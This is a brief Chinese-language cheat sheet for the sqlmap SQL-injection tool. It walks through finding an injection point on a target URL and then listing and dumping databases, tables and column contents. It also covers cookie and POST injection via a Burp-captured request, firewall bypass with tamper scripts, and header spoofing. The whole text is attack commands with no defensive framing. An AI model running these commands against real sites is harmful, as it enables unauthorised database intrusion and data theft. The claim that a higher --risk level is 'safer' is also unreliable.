sqlmap一把梭:注意:命令为kali linux中运行的 (windows中用python sqlmap.py执行)注入六连:1.sqlmap-u "http://www.xx.com?id=x"查询是否存在注入点2.--dbs 检测站点包含哪些数据库3.--current-db 获取当前的数据库名4.--tables -D "db_name"获取指定数据库中的表名 -D后接指定的数据库名称5.--columns -T "table_name"-D "db_name"获取数据库表中的字段6.--dump-C "columns_name"-T "table_name"-D "db_name"获取字段的数据内容COOKIE注入:sqlmap -u "http://www.xx.com/xxx.asp"--cookie "id=XXX cookie"--level 2\cookie注入 后接cookie值POST注入:(1)目标地址http:// www.xxx.com /login.asp(2)打开burp代理(3)点击表单提交(4)burp获取拦截信息(post)(5)右键保存文件(.txt)到指定目录下(6)运行sqlmap并执行如下命令:用例:sqlmap -r okay.txt -p username// -r表示加载文件(及步骤(5)保存的路径)-p指定参数(即拦截的post请求中表单提交的用户名或密码等name参数)(7)自动获取表单:--forms自动获取表单例如:sqlmap -u www.xx.com/login.asp --forms(8)指定参数搜索:--data例如:sqlmap -u www.xx.com/login.asp --data "username=1"常用指令:1.--purge 【重新扫描(--purge 删除原先对该目标扫描的记录)2.--tables 【获取表名3.--dbs 【检测站点包含哪些数据库4.--current-db 【获取当前的数据库名5.--current-user 【检测当前用户6.--is-dba 【判断站点的当前用户是否为数据库管理员7.--batch 【默认确认,不询问你是否输入8.--search 【后面跟参数 -D -T -C 搜索列(C),表(T)和或数据库名称(D)9.--threads 10【线程,sqlmap线程最高设置为1010.--level 3【sqlmap默认测试所有的GET和POST参数,当--level的值大于等于2的时候也会测试HTTP Cookie头的值,当大于等于3的时候也会测试User-Agent和HTTP Referer头的值。最高为511.--risk 3【执行测试的风险(0-3,默认为1)risk越高,越慢但是越安全12.-v 【详细的等级(0-6)0:只显示Python的回溯,错误和关键消息。1:显示信息和警告消息。2:显示调试消息。3:有效载荷注入。4:显示HTTP请求。5:显示HTTP响应头。6:显示HTTP响应页面的内容13.--privileges 【查看权限14.--tamper xx.py,cc.py 【防火墙绕过,后接tamper库中的py文件15.--method "POST"--data "page=1&id=2"【POST方式提交数据16.--threads number 【采用多线程 后接线程数17.--referer ""【使用referer欺骗18.--user-agent ""【自定义user-agent19.--proxy “目标地址″ 【使用代理注入sqlmap常用路径:1.添加表字段的目录在/usr/share/sqlmap/txt/common-tables.txt2.存放扫描记录的目录在/root/.sqlmap/output高阶玩法:自己写py脚本